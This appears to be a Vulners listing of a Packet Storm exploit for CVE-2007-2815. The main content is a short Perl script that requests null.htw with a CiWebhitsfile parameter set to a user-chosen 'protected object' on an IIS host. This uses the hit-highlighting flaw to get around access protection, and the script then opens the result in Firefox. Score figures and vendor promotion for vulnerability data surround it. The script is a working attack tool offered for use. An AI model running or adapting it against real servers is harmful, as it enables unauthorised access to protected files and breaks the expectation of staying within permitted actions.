Lucene search
K

CVE-2007-2815.txt

🗓️ 06 Jun 2007 00:00:00Reported by ff0000Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 62 Views

CVE-2007-2815 Perl script LWP module RC

Related
Code
`#######################  
# CVE-2007-2815  
# ff0000  
# [email protected]  
# 01/06/2007  
#######################  
#! /usr/bin/perl  
use LWP 5.64;  
require "getopt.pl";  
&Getopt('shop');  
$browser = LWP::UserAgent->new;  
$proto=$opt_s;if($opt_s){$proto="https";}else{$proto="http";}  
$host=$opt_h;if(!$opt_h){&usage();}  
$obj =$opt_o;if(!$opt_o){&usage();}  
$port=$opt_p;if(!$opt_p){$port=80;}  
$url = "$proto://$host:$port/b00/null.htw?CiWebhitsfile=$obj&CiRestriction=b&CiHiliteType=full";  
$command = "c:\\Program Files\\Mozilla Firefox\\firefox.exe";  
$response = $browser->get($url);  
$browser->timeout(10);  
if($response->is_success){`"$command" "$url"`;}  
else{print "\n[!] Unable to connect to $host on port $port.\n";}  
sub usage{print "$0 <-h hostname | ip address> <-o protected object> [-p port] [-ssl] ";exit;}  
  
=  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jun 2007 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.85872
62